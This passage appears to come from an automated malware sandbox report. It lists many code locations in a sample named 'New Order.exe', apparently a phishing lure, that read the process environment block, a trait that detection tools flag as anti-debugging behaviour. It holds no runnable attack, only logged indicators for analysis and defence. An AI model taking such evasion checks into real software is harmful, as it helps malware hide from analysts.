          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C74257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CAEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C9B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C9B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C2927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C03A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C24A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C24A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C923E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C923E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C923E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C9D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C12397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C13B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C13B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C7C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C7C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CAFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CAFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CAFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CAFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C98DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BFD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BFD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C23D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C63540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C93D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C07D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C6A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CAE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C28EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C9FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C7FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CAAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CAAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEC600 mov eax, dword ptr fs:[00000030h]
